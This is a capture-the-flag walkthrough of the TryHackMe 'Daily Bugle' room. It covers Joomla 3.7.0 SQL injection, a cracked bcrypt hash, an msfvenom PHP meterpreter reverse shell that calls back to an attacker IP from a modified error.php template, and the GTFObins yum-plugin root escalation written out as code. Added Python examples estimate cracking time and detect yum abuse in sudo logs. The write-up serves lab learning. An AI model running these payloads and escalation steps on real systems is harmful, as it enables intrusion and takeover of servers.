CHALLENGE OVERVIEW
- Link: https://tryhackme.com/room/dailybugle
- Difficulty: hard
- Target: user and root flags
- Highlight: leveraging sudo privileges on yum to gain persistent root access
- Tools used: nmap, dirb, sqlmap, hashcat, gtfobins
- Tags: joomla, sqli, yum
BACKGROUND

This box is another black-box-style challenge with a few extra guiding questions.
We learn that the “Daily Bugle” reports front-page news about Spiderman robbing a bank. It’s our job to hack into the system to recover the user + root flags.
The tags joomla, sqli, and yum also point us in the direction of the Joomla service, SQL injection, and leveraging user permissions on the yum binary to gain root access.

ENUMERATION/RECON

NMAP
sudo nmap -A -oN nmap-results.txt <$targetIP> -O
And we’ll follow that up with an nmap script scan for more information about potential vulnerabilities:
nmap --script vuln -O -oN nmap-vuln.txt 10.10.239.203
Here is a snippet of interesting nmap results:

DIRB
dirb <$targetIP>
A snippet of interesting dirb scan results:

Notable findings include the hidden web directory (/administrator) that has a login portal. We’ll keep this in mind for later on in the hack.
SQLMAP
Cross-referencing the vulnerability discovered by our nmap vuln script scan in exploit-db, we find a downloadable text exploit file with instructions to use sqlmap.

I attempted to execute this exploit via Metasploit console but had no luck.

Plan B is to use sqlmap with the command given in the text file from exploit-db.
Our first attempt at using sqlmap errors out, so we lower the risk variable and try again.

Our new command with risk=2 completes the job, but doesn’t turn up anything interesting.
Let’s search around for a different method to exploit this vulnerability.
INITIAL FOOTHOLD

We searched for a Joomla 3.7.0 exploit and found a Python script. Let’s go ahead and use the following command to start the exploit:
python3 sqli.py http://<$targetIP>/index.php?component/users/?view=login?
Success! We extracted a username and a hashed password.
Output:
Extracting users from fb9j5_users
[$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
CRACK THAT HASH WITH HASHCAT

Let’s fire up hashcat and start the cracking!
A quick Google search for a hash identifier website helps us determine that the hashing method used is the bcrypt/Blowfish algorithm. I looked up the id number for this hash in the help for hashcat and found it was -m 3200.
I omitted this step from the video to save time and keep people watching.
Hashcat took 51 mins, 18 secs to crack the hash using rockyou.txt for the wordlist. I also attempted to use John the Ripper to crack this hash, which was much slower than hashcat on my machine.

After saving the hash string in a file named hash, we can let hashcat do the work from here. Note that --show on its own only prints entries already cracked into the potfile, so the cracking run itself needs the wordlist (the rockyou.txt path shown in the results below); --show is what displays the cracked pair once the session has finished.
hashcat -m 3200 hash /home/kalisurfer/hacking-tools/rockyou.txt
hashcat -m 3200 --show hash
Results:
Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p...BtZutm
Time.Started.....: Mon Jan 30 12:15:23 2023 (51 mins, 18 secs)
Time.Estimated...: Mon Jan 30 13:06:41 2023 (0 secs)
Guess.Base.......: File (/home/kalisurfer/hacking-tools/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 15 H/s (17.05ms) @ Accel:8 Loops:8 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests
Progress.........: 46848/14344384 (0.33%)
Rejected.........: 0/46848 (0.00%)
Restore.Point....: 46816/14344384 (0.33%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
Candidates.#1....: sword -> smile4ever
Started: Mon Jan 30 12:15:18 2023
Stopped: Mon Jan 30 13:06:42 2023
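To make the hashcat figures above concrete, here is an added Python example (mine, not part of the original writeup) that parses the bcrypt string jonah’s password was stored as, maps it to the hashcat mode, and turns the reported 15 H/s into wall-clock estimates. The cost-12 comparison at the end is an assumed scenario, included to show why the bcrypt cost factor is the defender’s lever here.

```python
import re

# bcrypt modular-crypt format: $2<variant>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)

# hashcat lists every $2*$ bcrypt variant under a single mode, 3200
HASHCAT_MODE_BCRYPT = 3200


def parse_bcrypt(hash_str):
    """Split a bcrypt string into its fields and derive the per-guess work."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a bcrypt hash")
    cost = int(m.group("cost"))
    return {
        "variant": m.group("variant"),
        "cost": cost,
        "rounds": 2 ** cost,  # EksBlowfish key-setup iterations per guess
        "salt": m.group("salt"),
        "digest": m.group("digest"),
        "hashcat_mode": HASHCAT_MODE_BCRYPT,
    }


def estimate_seconds(candidates, hashes_per_second):
    """Wall-clock time to try `candidates` guesses at a measured cracking rate."""
    return candidates / hashes_per_second


def cost_multiplier(new_cost, old_cost):
    """Slowdown per guess when a site raises its cost factor (assumed scenario)."""
    return 2 ** (new_cost - old_cost)


if __name__ == "__main__":
    jonah = "$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm"
    print(parse_bcrypt(jonah))
    # Figures from the hashcat status block: 15 H/s, 46848 candidates before the hit
    print(round(estimate_seconds(46848, 15) / 60, 1), "minutes to reach the cracked guess")
    print(round(estimate_seconds(14344384, 15) / 86400, 1), "days to exhaust rockyou.txt")
    print(cost_multiplier(12, 10), "x slower per guess at cost 12 (assumed) instead of 10")
```

The 1024 rounds derived from the cost field match the Iteration:1016-1024 range hashcat reports in Restore.Sub above.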
The cracked hash was saved as a new file in the current directory. Now that we have our username and password we can go ahead and log in to that administrator portal we discovered earlier.
jonah:sp—--omitted—--23
Now that we are in the system as an administrator, we can modify the pages to add a revshell script. We’ll use the template for error.php and change the payload to a reverse meterpreter shell.
CREATE A METERPRETER PAYLOAD

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.6.2.23 LPORT=2222 -f raw > rev.php
UPLOAD THE FILE IN TEMPLATES/ERROR.PHP
We’ll use the common text editor VIM to copy everything in the payload.php file to our clipboard using the quick and easy command:
:%y+
% – apply the next command to all lines
y – yank
+ – copy to the clipboard register
And then :q! to quit without saving.
CATCH A REVERSE METERPRETER SHELL
We’ll set up the meterpreter listener using the exploit (multi/handler) options, being careful to set the payload to the same payload that we used when running msfvenom to create the malicious payload (payload = php/meterpreter_reverse_tcp).
After catching the meterpreter shell, we’ll proceed to upload linpeas and run it from the regular shell within Metasploit console. The password for jjameson was discovered in plaintext.

LOGIN AS jjameson VIA SSH

Now that we presumably have a password login combo with jjameson, let’s try connecting via ssh. It works, and we are in as jjameson. Let’s grab the user flag and then continue on to privesc.
EXPLOIT
cat user.txt
27—---omitted—------2e
PRIVILEGE ESCALATION
Let’s check sudo permissions with sudo -l.

Checking GTFObins for yum, we find a pathway toward root privileges. All we have to do is cut and paste the following lines from GTFObins. (Only the plugin file and the final command are reproduced here; the $TF directory and the config file $TF/x are set up by the earlier lines of that GTFObins entry.)
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=y
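From the defender’s side, an added Python example (mine, not the writeup’s) that scans sudo syslog lines for the pattern used above: a root-target yum run given a config file outside /etc or a plugin enabled from the command line. The host name, timestamps and temp path in the sample lines are constructed.

```python
import re

# Standard sudo syslog line shape: sudo: <user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<argv>
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+.*?USER=(?P<target>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$"
)


def yum_plugin_abuse(line):
    """Return the reasons a root-target sudo yum run looks like plugin abuse ([] if benign)."""
    m = SUDO_RE.search(line)
    if not m or m.group("target") != "root":
        return []
    argv = m.group("cmd").split()
    if not argv or not argv[0].endswith("/yum"):
        return []
    reasons = []
    for i, tok in enumerate(argv):
        path = None
        if tok in ("-c", "--config") and i + 1 < len(argv):
            path = argv[i + 1]
        elif tok.startswith("--config="):
            path = tok.split("=", 1)[1]
        if path and not path.startswith("/etc/"):
            reasons.append("custom config outside /etc: " + path)
        if tok.startswith("--enableplugin"):
            reasons.append("plugin enabled on the command line")
    return reasons


def scan(lines):
    """Map the index of every suspicious line to its reasons."""
    hits = {}
    for i, line in enumerate(lines):
        reasons = yum_plugin_abuse(line)
        if reasons:
            hits[i] = reasons
    return hits


# Constructed sample log: one routine update, one run matching the GTFObins pattern
SAMPLE_LOG = [
    "Jan 30 13:10:01 dailybugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; "
    "USER=root ; COMMAND=/usr/bin/yum update -y",
    "Jan 30 13:12:44 dailybugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; "
    "USER=root ; COMMAND=/usr/bin/yum -c /tmp/tmp.Ab12Cd/x --enableplugin=y",
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_LOG).items():
        print(f"line {idx}: {'; '.join(why)}")
```

A sudoers rule that grants yum to a user without restricting its arguments is what makes this path possible; the same check is a reasonable alert rule wherever yum or dnf is sudo-permitted.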
POST-EXPLOITATION

Now we can recover the root flag in the usual spot: /root/root.txt
ee—---------omitted—----------79
FINAL THOUGHTS
Although this box has a difficulty rating of hard, I didn’t find it to be much more complex than some of the easy-rated boxes on TryHackMe. It did take a few extra hours to complete, so maybe length is a factor that they consider when determining difficulty ratings.
PERSONAL HACKING GOALS

My immediate goal is to get into the top 1% of hackers ranked on the platform. I’m currently in the top 2% and still need to surpass roughly 10,000 hackers before I can join the ranks in the top 1%.
Jumping from a new hacker to the top 3% seemed to happen very quickly. The jump to the top 2% took considerable effort, and the next jump seems exponentially more difficult.

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.